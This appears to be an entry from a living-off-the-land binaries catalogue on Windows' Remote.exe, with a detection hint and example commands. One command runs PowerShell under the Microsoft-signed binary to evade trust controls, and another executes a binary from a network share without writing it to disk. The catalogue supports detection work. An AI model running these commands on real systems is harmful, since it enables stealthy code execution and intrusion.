Debugging tool included with Windows Debugging Tools
Paths:
Acknowledgement:
mr.d0x - @mrd0x
Detection:
remote.exe spawned
Remote.exe /s "powershell.exe" anythinghere
Usecase:Executes a process under a trusted Microsoft signed binary
Remote.exe /s "powershell.exe" anythinghere
Usecase:Executes a process under a trusted Microsoft signed binary
Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere
Usecase:Executing a remote binary without saving file to disk